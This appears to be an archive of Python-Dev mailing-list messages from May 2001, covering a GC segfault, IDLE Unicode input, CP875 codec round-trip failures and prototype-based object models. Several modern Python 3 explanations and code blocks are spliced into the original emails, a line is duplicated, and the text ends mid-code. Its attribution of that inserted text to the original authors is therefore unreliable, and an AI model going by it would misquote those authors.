    buf=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk", type=5)
    at ../Python/import.c:1310
#30 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffe0b0 "gtk", 
    fullname=0xbfffe0b0 "gtk") at ../Python/import.c:1815
#31 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, 
    p_name=0xbfffe4e0, buf=0xbfffe0b0 "gtk", p_buflen=0xbfffe0ac)
    at ../Python/import.c:1671
#32 0x08067bcc in import_module_ex (name=0x0, globals=0x828c3fc, 
    locals=0x828c3fc, fromlist=0x80bf3cc) at ../Python/import.c:1522
#33 0x08067d23 in PyImport_ImportModuleEx (name=0x811556c "gtk", 
    globals=0x828c3fc, locals=0x828c3fc, fromlist=0x80bf3cc)
    at ../Python/import.c:1563
#34 0x0809f4b9 in builtin___import__ (self=0x0, args=0x829651c)
    at ../Python/bltinmodule.c:31
#35 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x829651c, kw=0x0)
    at ../Python/ceval.c:2838
#36 0x080590d5 in call_object (func=0x80cdcf0, arg=0x829651c, kw=0x0)
    at ../Python/ceval.c:2801
#37 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, 
    arg=0x829651c, kw=0x0) at ../Python/ceval.c:2734
#38 0x08057764 in eval_code2 (co=0x82968b8, globals=0x828c3fc, 
    locals=0x828c3fc, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, 
    defcount=0, closure=0x0) at ../Python/ceval.c:1820
#39 0x08055085 in PyEval_EvalCode (co=0x82968b8, globals=0x828c3fc, 
    locals=0x828c3fc) at ../Python/ceval.c:346
#40 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffeff0 "seg", 
    co=0x82968b8, pathname=0xbfffe6f0 "seg.pyc") at ../Python/import.c:490
#41 0x08066fc7 in load_source_module (name=0xbfffeff0 "seg", 
    pathname=0xbfffeb60 "seg.py", fp=0x820cd60) at ../Python/import.c:754
#42 0x0806775e in load_module (name=0xbfffeff0 "seg", fp=0x820cd60, 
    buf=0xbfffeb60 "seg.py", type=1) at ../Python/import.c:1287
#43 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffeff0 "seg", 
    fullname=0xbfffeff0 "seg") at ../Python/import.c:1815
#44 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, 
    p_name=0xbffff420, buf=0xbfffeff0 "seg", p_buflen=0xbfffefec)
    at ../Python/import.c:1671
#45 0x08067bcc in import_module_ex (name=0x0, globals=0x80d21e4, 
    locals=0x80d21e4, fromlist=0x80bf3cc) at ../Python/import.c:1522
#46 0x08067d23 in PyImport_ImportModuleEx (name=0x828c61c "seg", 
    globals=0x80d21e4, locals=0x80d21e4, fromlist=0x80bf3cc)
    at ../Python/import.c:1563
#47 0x0809f4b9 in builtin___import__ (self=0x0, args=0x80e7bc4)
    at ../Python/bltinmodule.c:31
#48 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0)
    at ../Python/ceval.c:2838
#49 0x080590d5 in call_object (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0)
    at ../Python/ceval.c:2801
#50 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, 
    arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2734
#51 0x08057764 in eval_code2 (co=0x8115908, globals=0x80d21e4, 
    locals=0x80d21e4, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, 
    defcount=0, closure=0x0) at ../Python/ceval.c:1820
#52 0x08055085 in PyEval_EvalCode (co=0x8115908, globals=0x80d21e4, 
    locals=0x80d21e4) at ../Python/ceval.c:346
#53 0x0806da1f in run_node (n=0x8115558, filename=0x80a496d "<stdin>", 
    globals=0x80d21e4, locals=0x80d21e4, flags=0xbffff708)
    at ../Python/pythonrun.c:1045
#54 0x0806cb2a in PyRun_InteractiveOneFlags (fp=0x4018e620, 
    filename=0x80a496d "<stdin>", flags=0xbffff708)
    at ../Python/pythonrun.c:570
#55 0x0806c98c in PyRun_InteractiveLoopFlags (fp=0x4018e620, 
    filename=0x80a496d "<stdin>", flags=0xbffff708)
    at ../Python/pythonrun.c:510
#56 0x0806c85a in PyRun_AnyFileExFlags (fp=0x4018e620, 
    filename=0x80a496d "<stdin>", closeit=0, flags=0xbffff708)
    at ../Python/pythonrun.c:473
#57 0x08051fae in Py_Main (argc=1, argv=0xbffff78c) at ../Modules/main.c:320
#58 0x400831f0 in __libc_start_main () from /lib/libc.so.6


From guido@digicool.com  Fri May 11 22:49:00 2001
From: guido@digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 16:49:00 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: Your message of "Fri, 11 May 2001 15:41:30 EST."
 <15100.20090.573866.569667@beluga.mojam.com>
References: <15100.20090.573866.569667@beluga.mojam.com>
Message-ID: <200105112149.QAA07533@cj20424-a.reston1.va.home.com>

> Has anyone investigated interactions between ExtensionClass objects and GC?
> I've encountered segfaults with 2.1 in certain situations when using the
> latest PyGtk stuff.  The gdb traceback (appended) sort of suggests the two
> intersect somewhere.  PyGtk provides a Python interface to the Gtk widget
> set using ExtensionClasses.  Any ideas how I should approach the problem?  I
> don't know either piece of code at all, and the code that generates the
> segfault isn't particularly small, not to mention that it uses the bleeding
> edge Gtk stuff (which I doubt anyone on this list will have installed) and a
> version of ExtensionClass patched by James Henstridge, the PyGtk author.
> 
> Here's what I know:
> 
>     1. Disabling gc gets rid of the segfault
>     2. I only see the problem with importing a specific module that
>        subclasses the GtkTextView widget from the Python command line.  If I
>        run it as a script from the shell prompt, I get no segfault.
>     3. If I first import the gtk module, then import my module, I get no
>        segfault. 
>     4. Most changes I make to the module causing the problem cause the
>        problem to disappear.
> 
> All told, all this really tells me is I'm probably dealing with a
> malloc/free problem of some sort.
> 
> Neil and/or Jim (and/or anyone else willing to look into this problem), I
> can give you access to my development machine via ssh if you think that
> would help debug the problem.

AFAIK, the latest version of Zope (which uses ExtensionClass
extensively if not exclusively :-) works fine with Python 2.1.

This suggests pointing a finger towards the PyGtk code... :-(

--Guido van Rossum (home page: http://www.python.org/~guido/)


From loewis@informatik.hu-berlin.de  Fri May 11 21:53:55 2001
From: loewis@informatik.hu-berlin.de (Martin von Loewis)
Date: Fri, 11 May 2001 22:53:55 +0200 (MEST)
Subject: [Python-Dev] IDLE and non-ASCII characters
Message-ID: <200105112053.WAA15657@pandora.informatik.hu-berlin.de>

Thanks to a bug report I got, I noticed for the first time that you
cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell
prompt, you may get

>>> s='äö'
UnicodeError: ASCII encoding error: ordinal not in range(128)

Likewise, when trying to save a file that has non-ASCII characters,
you get a traceback.
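Both failures come from converting a Unicode string with the default ASCII codec. A small Python 3 sketch of the same error, and of how naming an encoding explicitly avoids it; `encode_for_save` is a hypothetical helper, and which encoding IDLE should actually choose is exactly the open question in this message.

```python
def encode_for_save(text, encoding):
    """Encode editor text for writing to disk.

    Returns (bytes, None) on success, or (None, reason) if the text
    cannot be represented in the requested encoding.
    """
    try:
        return text.encode(encoding), None
    except UnicodeEncodeError as exc:
        return None, exc.reason

s = "\u00e4\u00f6"  # the 'äö' typed at the shell prompt above
```

With `"ascii"` this reproduces the "ordinal not in range(128)" complaint; with `"latin-1"` or `"utf-8"` the same text round-trips.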

Now, I think I understand all the causes of the problem (Tkinter
returning Unicode objects, and so on). However, I'm curious whether
anybody has proposals on how to deal with it.

For saving text files, if Python had an encoding directive, things
might be easier :-) For the shell prompt, I've no idea how to solve
this best.

So any suggestions are welcome.

Regards,
Martin


From fredrik@pythonware.com  Fri May 11 23:18:27 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Sat, 12 May 2001 00:18:27 +0200
Subject: [Python-Dev] status of pre?
References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com>  <200105111847.NAA05835@cj20424-a.reston1.va.home.com>
Message-ID: <00ca01c0da68$4fc66570$e46940d5@hagrid>

guido wrote:
> 
> We could put a warning on using pre or pcre in 2.2, and remove it in
> 2.3, hoping that /F fixes the recursion limit problems in the mean
> time (weren't those related to the backtracking implementation)?

2.2 is to be released in October, right?  I'm sure I could shake
out the remaining bugs in my "stackless SRE" patch until then...

Cheers /F


From fredrik@effbot.org  Sat May 12 00:03:10 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Sat, 12 May 2001 01:03:10 +0200
Subject: [Python-Dev] Hats off to them!
Message-ID: <014a01c0da6e$93578ca0$e46940d5@hagrid>

http://www.theregister.co.uk/content/4/18909.html

    "Microsoft Altair BASIC legend talks about Linux, CPRM and
    that very frightening photo

    ...

    His other passion, he tells us, is Python. 

    "Hats off to them. It's an extremely well designed language. It's
    object orientated from the get-go. They've really succeeded there,"
    he says, and commends it as the ideal teaching language. That
    used to be BASIC, of course"

    ...

(no, it's not Bill)

Cheers /F


From fredrik@effbot.org  Sat May 12 00:14:47 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Sat, 12 May 2001 01:14:47 +0200
Subject: [Python-Dev] Hats off to them!
References: <014a01c0da6e$93578ca0$e46940d5@hagrid>
Message-ID: <015001c0da70$3078cf70$e46940d5@hagrid>

>     "Hats off to them. It's an extremely well designed language. It's
>     object orientated from the get-go. They've really succeeded there,"
>     he says, and commends it as the ideal teaching language. That
>     used to be BASIC, of course"

reading on, I'm not sure why BASIC ever was the ideal teaching
language:

http://www.americanhistory.si.edu/csr/comphist/gates.htm#tc11

    "One of the nice things about this BASIC is it has this so called
    direct mode. So you can PRINT 2 + 2. It prints the square root
    of ten"

Cheers /F


From sdm7g@Virginia.EDU  Sat May 12 03:43:31 2001
From: sdm7g@Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 22:43:31 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook>
Message-ID: <Pine.NXT.4.21.0105112009300.248-100000@localhost.virginia.edu>


On Fri, 11 May 2001, Thomas Heller wrote:

> I never looked at Self or other prototype based systems.
> Is it really true that prototypes are a lot simpler than
> metaclasses, but on the other hand more powerful?

Definitely simpler: No classes, No metaclasses, only objects.

Ignore for now the fact that a limited set of classes are 
handier for a statically type checked language and just 
consider dynamic languages, which is their proper domain.      

Prototype semantics basically subsume class semantics. 
Any object can be an exemplar and fill the role of a class,
and it can be used ONLY as a template and holder of shared
behaviour, so it can be used like a class. 
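To make "an exemplar fills the role of a class" concrete, here is a minimal single-parent prototype object in Python 3. It is a sketch, not how Self or XlispStat implement it: `Proto` and its `clone` method are hypothetical names, and only attribute lookup is delegated (functions stored in slots are not bound to the receiver).

```python
class Proto:
    """A minimal prototype object: its own slots plus one parent slot."""

    def __init__(self, parent=None, **slots):
        self.__dict__["_parent"] = parent
        self.__dict__.update(slots)

    def __getattr__(self, name):
        # Only called when normal lookup misses: delegate up the parent chain.
        parent = self.__dict__["_parent"]
        if parent is None:
            raise AttributeError(name)
        return getattr(parent, name)

    def clone(self, **slots):
        # A clone holds only its overrides and inherits the rest from self.
        return Proto(self, **slots)
```

Usage: `point = Proto(x=0, y=0)` acts as the "class"; `p = point.clone(x=3)` overrides `x` and inherits `y`, and a later `point.y = 7` is immediately visible through `p`, since nothing was copied.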

[One of the Self papers -- one which I haven't read -- is
entitled "Self includes Smalltalk" -- and is, I believe,
a demonstration that Smalltalk is sort of a subset of Self.]


But you can also have finer-grained classification and you 
can have object inheritance. ( This is handy in XlispStat,
which is oriented towards statistics and analysis: you can
have derived objects, for example different subsamples of
the same population, or in my app, different energy spectra,
along with derived and processed spectra with special rules
for treatment: e.g. linear filtered spectra have a filter
function or kernel, and if they are fit against reference
spectra, they need to be fit against references that have 
had the same filter applied to them -- if none available
create one from unfiltered samples -- and maybe a whole
chain of derived data. In a class based system, you would
have to manually maintain a separate linked list of objects,
but in a prototype system they can all be cloned from their
parent objects. )   

The other plus for things like exploratory statistics is that
you don't have to design a class hierarchy ahead of time -- 
it's more concrete and less abstract than a class-based system.

Prototypes can also solve some of the sort of problems that
Jim Fulton's acquisition framework in Zope is designed to 
handle. (But it's been a while since I read that paper and
I haven't used it, so I'm relying on my memory of thinking
"Yeah -- that would be simpler with prototypes" ) 

You definitely don't have to worry about simulating the 
Prototype Pattern. (I've seen GUI systems in C++ that go
thru a lot of code to add prototype-like behavior to C++ classes.) 


But -- unless I can figure a useful way to use it under the
covers, it's not really a topic for python-dev.  


> The 'brain exploding properties' of metaclasses are IMO
> only there because my brain cannot think easily in too
> many recursion steps...

It's just like spelling bananana -- the problem is to know
when to stop! ;-)


-- Steve Majewski


From tim_one@email.msn.com  Sat May 12 12:28:27 2001
From: tim_one@email.msn.com (Tim Peters)
Date: Sat, 12 May 2001 07:28:27 -0400
Subject: [Python-Dev] Ill-defined encoding for CP875?
Message-ID: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>

I have a way to make dict lookup a teensy bit cheaper(*) that significantly
reduces the number of collisions (which is much more valuable).

This caused a number of std tests to fail, because they were implicitly
relying on the order in which a dict's entries are materialized via .keys()
or .items().

Most of these were easy enough to fix.  The last failure remaining is
test_unicode, and I don't know how to fix it.  It's dying here:

    try:
        verify(unicode(s,encoding).encode(encoding) == s)
    except TestFailed:
        print '*** codec "%s" failed round-trip' % encoding
    except ValueError,why:
        print '*** codec for "%s" failed: %s' % (encoding, why)

when encoding == "cp875".  There's a bogus problem you have to worm around
first:  test_unicode neglected to import TestFailed, so it actually dies
with NameError while trying the "except TestFailed" clause after verify()
raises TestFailed.  Once that's repaired, it's complaining about failing the
round-trip encoding.

The original character in s it's griping about is "?" (0x3f).  cp875.py has
this entry in its decoding_map dict:

	0x003f: 0x001a,	# SUBSTITUTE

But 0x1a is not a *unique* value in this dict.  There's also

	0x00dc: 0x001a,	# SUBSTITUTE
	0x00e1: 0x001a,	# SUBSTITUTE
	0x00ec: 0x001a,	# SUBSTITUTE
	0x00ed: 0x001a,	# SUBSTITUTE
	0x00fc: 0x001a,	# SUBSTITUTE
	0x00fd: 0x001a,	# SUBSTITUTE

Therefore what appears associated with 0x1a in the derived encoding_map
dict:

encoding_map = {}
for k,v in decoding_map.items():
    encoding_map[v] = k

may end up being any of the 7 decoding_map keys that map to 0x1a.  It just
so happened to map back to 0x3f before, but to 0xfd after the dict change,
so "?" doesn't survive the round trip anymore.

My knowledge of encoding internals is exceeded only by my mastery of file
URLs under Windows <wink>, so I could sure use some help getting this
repaired.  I'd really like to check in the dict improvement (+ test
repairs), but won't do it so long as it makes a std test fail.  If, e.g.,
you're *relying* on "the first" of a set of ambiguous reverse mappings
winning the game, then iterating over decoding_map.items() in reverse sorted
order would do the trick reliablly.  But I don't know whether the ambiguity
order would do the trick reliably.  But I don't know whether the ambiguity
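The reverse-sorted idea can be sketched in Python 3 as follows. This illustrates the technique only; it is not a patch to the machine-generated cp875.py, and `build_encoding_map` is a hypothetical name.

```python
def build_encoding_map(decoding_map):
    """Invert a charmap decoding table deterministically.

    Iterating in reverse sorted key order means that when several bytes
    decode to the same character, the lowest byte is written last and wins,
    independent of dict ordering.
    """
    encoding_map = {}
    for k, v in sorted(decoding_map.items(), reverse=True):
        encoding_map[v] = k
    return encoding_map

# The SUBSTITUTE entries quoted above, plus one illustrative unambiguous
# entry (0x0041 -> 0x0391 is made up for the example, not taken from cp875).
decoding_map = {0x003f: 0x001a, 0x00dc: 0x001a, 0x00e1: 0x001a,
                0x00ec: 0x001a, 0x00ed: 0x001a, 0x00fc: 0x001a,
                0x00fd: 0x001a, 0x0041: 0x0391}
```

With this ordering 0x1a always encodes back to 0x3f, so "?" survives the round trip whatever the dict implementation does.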

7-bit-ascii-looks-better-every-day<wink>-ly y'rs  - tim


(*) Simply by taking the damn "~" off "~hash" -- I explained quite a while
ago why that can lead to a weak form of clustering "in theory", and
instrumenting the dict lookup code confirmed that it does hurt in real life.


From guido@digicool.com  Sat May 12 13:28:23 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sat, 12 May 2001 07:28:23 -0500
Subject: [Python-Dev] prototypes (was: Type/class)
In-Reply-To: Your message of "Fri, 11 May 2001 22:43:31 -0400."
 <Pine.NXT.4.21.0105112009300.248-100000@localhost.virginia.edu>
References: <Pine.NXT.4.21.0105112009300.248-100000@localhost.virginia.edu>
Message-ID: <200105121228.HAA08988@cj20424-a.reston1.va.home.com>

Do prototype-based languages have the equivalent of multiple
inheritance?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim_one@email.msn.com  Sat May 12 13:16:33 2001
From: tim_one@email.msn.com (Tim Peters)
Date: Sat, 12 May 2001 08:16:33 -0400
Subject: [Python-Dev] prototypes (was: Type/class)
In-Reply-To: <200105121228.HAA08988@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEMBKBAA.tim_one@email.msn.com>

[Guido]
> Do prototype-based languages have the equivalent of multiple
> inheritance?

Just as for class-based languages, whether a prototype-based language
supports an MI workalike varies by language.  In a class-based language with
MI, a class can have multiple base classes; in a prototype-based language
with an MI workalike, an object can have multiple prototype objects.  The
same kinds of ambiguities can arise, and the same kinds of resolution
strategies are applicable (imposed linearization; user-supplied
qualification; user-supplied renaming; guessing <0.7 wink>).

JavaScript is the best-known prototype language that does not support
multiple prototypes per object.  A very readable intro to its object model
is here:

  http://developer.netscape.com/docs/manuals/communicator/jsobj/jsobj.pdf

It's interesting because, near the end, the author explores a bit how far
you can get *trying* to fake MI in JS.  The answer is "farther than you
might think", but not all the way.


From fredrik@pythonware.com  Sat May 12 13:25:43 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Sat, 12 May 2001 14:25:43 +0200
Subject: [Python-Dev] Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>
Message-ID: <02e501c0dade$ab7f1080$e46940d5@hagrid>

tim wrote:
> If, e.g., you're *relying* on "the first" of a set of ambiguous reverse mappings
> winning the game, then iterating over decoding_map.items() in reverse sorted
> order would do the trick reliably.

reverse sorting makes sense to me.  but the cp-files appear to be
machine generated, so patching that python file won't help.

> But I don't know whether the ambiguity in cp875 is a bug or an undocumented
> feature ...

a truly future-proof solution would be to specify exactly how to resolve
every many-to-one mapping, for every font having that problem.  but
sorting them is clearly better than relying on implementation-dependent
behaviour...
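A sketch of the reverse-sorting idea in Python. The U+001A entries use the cp875 bytes reported later in this thread; the 0xC1/0xC2 entries are illustrative only, and `build_encoding_map` is a hypothetical helper, not the codec generator's actual code.

```python
# Illustrative excerpt of a many-to-one decoding map (byte -> code point).
decoding_map = {
    0xE1: 0x1A, 0x3F: 0x1A, 0xDC: 0x1A,
    0xC1: 0x41, 0xC2: 0x42,
}

def build_encoding_map(decoding_map):
    """Invert decoding_map so the lowest byte wins each collision.

    Walking the items in reverse sorted order writes the smallest byte
    for a code point last, so the result no longer depends on the order
    in which the dict happens to yield its items.
    """
    encoding_map = {}
    for byte, code_point in sorted(decoding_map.items(), reverse=True):
        encoding_map[code_point] = byte
    return encoding_map

encoding_map = build_encoding_map(decoding_map)
print(hex(encoding_map[0x1A]))  # 0x3f
```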

(is Jython using exactly the same hashing and dictionary algorithms as
CPython?  or does it work by accident also under Jython?)

Cheers /F


From nas@python.ca  Sat May 12 15:28:54 2001
From: nas@python.ca (Neil Schemenauer)
Date: Sat, 12 May 2001 07:28:54 -0700
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <15100.20090.573866.569667@beluga.mojam.com>; from skip@pobox.com on Fri, May 11, 2001 at 03:41:30PM -0500
References: <15100.20090.573866.569667@beluga.mojam.com>
Message-ID: <20010512072854.A4271@glacier.fnational.com>

--HlL+5n6rz5pIUxbD
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

skip@pobox.com wrote:
>
> Has anyone investigated interactions between ExtensionClass objects and GC?
> I've encountered segfaults with 2.1 in certain situations when using the
> latest PyGtk stuff.

Do any of the PyGtk objects define the GC type flag?

The GC is fairly good at exposing memory management bugs that
otherwise go unnoticed.  If you're using glibc you can try setting
the MALLOC_CHECK_ environment variable to 2.  If you've got lots
of memory you could also try running your program under Electric
Fence.  Finally, you might try compiling with Py_DEBUG
defined.
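A small sketch of the first suggestion: launching a child process with MALLOC_CHECK_ set. The helper name is hypothetical, and how the variable is honoured depends on the C library: it is a GNU libc feature, and recent glibc versions may also require the malloc debugging library to be preloaded.

```python
import os
import subprocess
import sys

def run_with_malloc_check(argv, level="2"):
    """Run argv with MALLOC_CHECK_ set in its environment.

    With level 2, GNU libc's malloc is asked to abort when it detects
    heap corruption instead of carrying on.  Other C libraries simply
    ignore the variable.
    """
    env = dict(os.environ, MALLOC_CHECK_=level)
    return subprocess.run(argv, env=env, capture_output=True, text=True)

# Hypothetical usage: run a script under the checking allocator.
result = run_with_malloc_check([sys.executable, "-c", "print('ok')"])
print(result.returncode, result.stdout.strip())
```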

> Neil and/or Jim (and/or anyone else willing to look into this problem), I
> can give you access to my development machine via ssh if you think that
> would help debug the problem.

I'd be willing to take a look (the chances of me reproducing it
don't look good).  A public RSA key is attached.

  Neil

1024 35 1372392199657274371686721919189033793743756930167147933612297754126=
598259273931615299793939606535704607722644783446173838392284136573447881967=
319012596588320802053877521752598768614155667872751121516571978298556660249=
308172933987227071278497487693980378602960539924485391548971170156265529348=
77126704135564999 nas


--HlL+5n6rz5pIUxbD--


From sdm7g@Virginia.EDU  Sat May 12 16:07:06 2001
From: sdm7g@Virginia.EDU (Steven D. Majewski)
Date: Sat, 12 May 2001 11:07:06 -0400 (EDT)
Subject: [Python-Dev] prototypes (was: Type/class)
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEMBKBAA.tim_one@email.msn.com>
Message-ID: <Pine.NXT.4.21.0105121011450.241-100000@localhost>


[Guido]
> Do prototype-based language have the equivalence of multiple
> inheritance?
 
Yeah ... What Tim said... 

Also: There are two basic implementation models:

Delegation  [a.k.a. "Lifetime sharing", cloning]
  sort of like Python -- if you don't know how to handle it, "ask"
  a parent object. ( "ask" in quotes, because I've recently been
  in a long argument about whether Objective-C & Smalltalk can
  really be said to "send messages", or if it's "just" dynamic
  lookup and function application! )

Extension  [a.k.a. "Birth sharing", copying, concatenation ]
  more like how I imagine C++ vtables are built -- the Python
  equivalent would be like merging all of the class __dict__'s
  together with name-clash priority going to the nearest
  relative.

( "Life Sharing" vs. "Birth Sharing" -- is a change in the
  base class after object creation inherited by the object? )
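The "life sharing" vs. "birth sharing" question can be shown with a minimal Python sketch. Plain dicts stand in for parent objects, and both child classes are hypothetical.

```python
class DelegatingChild:
    """Delegation ("life sharing"): ask the parent on every lookup."""

    def __init__(self, parent, **own):
        self.parent = parent
        self.own = dict(own)

    def get(self, name):
        if name in self.own:
            return self.own[name]
        return self.parent[name]


class ExtendedChild:
    """Extension ("birth sharing"): copy the parent's slots once, at creation."""

    def __init__(self, parent, **own):
        # Later keys win, so the child's own slots shadow the parent's.
        self.slots = {**parent, **own}

    def get(self, name):
        return self.slots[name]


parent = {"greet": "hello", "size": 1}
delegating = DelegatingChild(parent, size=2)
extended = ExtendedChild(parent, size=2)

parent["greet"] = "bonjour"          # change the parent after both are "born"

print(delegating.get("greet"))       # bonjour (delegation sees the change)
print(extended.get("greet"))         # hello   (extension kept its copy)
print(delegating.get("size"), extended.get("size"))  # 2 2
```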

 I think most multiple-inheritance languages use delegation, but
there's no reason it wouldn't work with extension. The difference is that
with extension, everything has to be resolved at object creation.
 Extension could be made more flexible if on creation, you could 
not only add new methods, but rearrange and control the extension
process ( sort of like "from xxx import yyy; from aaa import bbb" ).
 I would think one could use delegation by default, but provide 
an extension mechanism as an optimization, but I don't know if 
there's any system that does this. 

 If it follows the paradigm, a prototype system doesn't have an 
'isa' or '__class__' slot -- only a (linked) list of parent objects.
But if you were simulating class orientation, one would add 
an 'isa' slot for the immediate prototype, and probably enforce
some restrictions on the prototype objects that were playing the
role of class objects.

 "If it follows the paradigm" -- as in OO in general, there are
several flavors and implementations, and some may be hybrid
systems.
  Self is the language most widely known as a prototype-based
language. Some others: NewtonScript (from Apple's late, lamented
Newton palmtop), Kevo (a Forth-based OO language), Cardelli's
Obliq (this didn't stick in my mind from when I read the papers
back in the "safe Python" development days, but it's listed in
my book), as well as XlispStat's object system (which isn't
listed in that book, but there is an ObjectLisp -- I don't know
if they were at all related) -- and Tim said JavaScript.
The Amulet and Garnet GUI systems are prototype-based -- Garnet
written in Lisp and Amulet in C++.

 For NewtonScript, Kevo, and maybe JavaScript, I suspect the
simplicity of the system was a motivation. 
 
("the book" I'm reading is "Prototype-Based Programming -- Concepts,
Languages and Applications" ed. James Noble, Antero Taivalsaari, Ivan
Moore, pub. Springer. A collection of papers, some of which are 
available on the Web -- I know the Self papers, one description of
NewtonScript, and one or two articles on Kevo are online, as well
as Cardelli's Obliq paper. )


-- "Steve" Majewski


From martin@loewis.home.cs.tu-berlin.de  Sat May 12 20:16:58 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sat, 12 May 2001 21:16:58 +0200
Subject: [Python-Dev] GC and ExtensionClass
Message-ID: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>

> Has anyone investigated interactions between ExtensionClass objects
> and GC?

At some point, extension classes used a literal copy of
PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so,
and only had the spare fields that were expected then. Today,
PyTypeObject has many more fields, so extension objects produce random
errors (eg. with GC) when used in a modern interpreter (where the copy
has not been synchronized). Whatever immediately follows the type
object in memory may be interpreted as the GC flag.

Regards,
Martin


From guido@digicool.com  Sat May 12 22:08:05 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sat, 12 May 2001 16:08:05 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: Your message of "Sat, 12 May 2001 21:16:58 +0200."
 <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
Message-ID: <200105122108.QAA09951@cj20424-a.reston1.va.home.com>

> At some point, extension classes used a literal copy of
> PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so,
> and only had the spare fields that were expected then. Today,
> PyTypeObject has much more fields, so extension objects produce random
> errors (eg. with GC) when used in a modern interpreter (where the copy
> has not been synchronized). Whatever immediately follows the type
> object in memory may be interpreted as GC flag.

Not quite true.  ExtensionClasses (at least recent versions that
worked with 1.5.2) contain a copy of the type object up to and
including the tp_flags field, and the 2.1 code is careful not to use
any newer fields without first checking the corresponding flag bit.

Now, if you are using the 1.4 version of ExtensionClasses you might
not have the tp_flags field either (I don't know, I can't easily
check) but the 1.5.2-compatible version of ExtensionClasses doesn't
even require recompilation to work with Python 2.1.
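The guarded access described here can be sketched in Python. The dictionaries stand in for type objects, and `HAVE_TRAVERSE` is a hypothetical flag bit for this sketch, not the real `Py_TPFLAGS_*` value.

```python
HAVE_TRAVERSE = 1 << 14  # hypothetical flag bit for this sketch only

def get_traverse(type_record):
    """Return the traverse slot only if the type says the slot exists.

    Older type objects never set the flag, so whatever happens to sit
    where the slot would be is never read.
    """
    if type_record.get("tp_flags", 0) & HAVE_TRAVERSE:
        return type_record.get("tp_traverse")
    return None

old_style = {"tp_name": "OldThing", "tp_traverse": 0x1234}  # junk in the slot
new_style = {"tp_name": "NewThing", "tp_flags": HAVE_TRAVERSE,
             "tp_traverse": len}

print(get_traverse(old_style))  # None: no flag, so the junk is ignored
```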

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin@loewis.home.cs.tu-berlin.de  Sat May 12 21:12:39 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sat, 12 May 2001 22:12:39 +0200
Subject: [Python-Dev] Ill-defined encoding for CP875?
Message-ID: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de>

> But I don't know whether the ambiguity in cp875 is a bug or an
> undocumented feature

The official (as in "as official as it gets") mapping between CP 875
and Unicode is at

http://www.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/EBCDIC/CP875.TXT

This is also the file which served as an input to generate cp875.py.

Character 1A, which is the mapping result of these characters, is
indeed known by the name "SUBSTITUTE", apparently following the
definition in

http://www.its.bldrdoc.gov/fs-1037/dir-035/_5170.htm

# substitute character (SUB): A control character that is used in the
# place of a character that is recognized to be invalid or in error or
# that cannot be represented on a given device.

That would suggest that these characters in EBCDIC 875 do not have
equivalents in Unicode. However,

http://www.kostis.net/charsets/ebc875.htm

suggests that the characters in question (3F, DC, E1, EC, ED, FC, and
FD) have no character meaning at all.

It seems that IBM's ICU library also maps U+001A to character 3F, see

http://oss.software.ibm.com/developerworks/opensource/cvs/icu/data/ibm-875_P100-2000.ucm?rev=1.1&content-type=text/x-cvsweb-markup

It appears, from looking at

http://www.natural-innovations.com/boo/asciiebcdic.html

that byte 3F *is* the substitution character in EBCDIC. So it is a bug
in the CP875 codec to map Unicode SUBSTITUTE to an arbitrary EBCDIC
character which is mapped to SUBSTITUTE; I think cp875 should be
corrected to always map U+001A to 3F. That is not something the
generator can currently do, though.

So I think we can take one of two approaches:

1. admit that CP 875 is not round-trippable, and exclude it from the
   test (although when looking at the first 128 characters only, it
   is round-trippable).
2. remove the SUBSTITUTE mappings from CP875, acknowledging that
   apparently these characters have no meaning in that code page.
   Unfortunately, I could not find any official IBM documentation
   page that lists the characters supported in each of the EBCDIC
   code pages.
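Approach 2 could look roughly like the Python sketch below. The seven U+001A bytes are the ones listed for cp875 in this thread; the 0xC1 entry is illustrative. Marking a byte as `None` assumes the generated charmap codec treats such entries as undefined. Both helper names are hypothetical.

```python
SUBSTITUTE = 0x1A  # U+001A SUBSTITUTE

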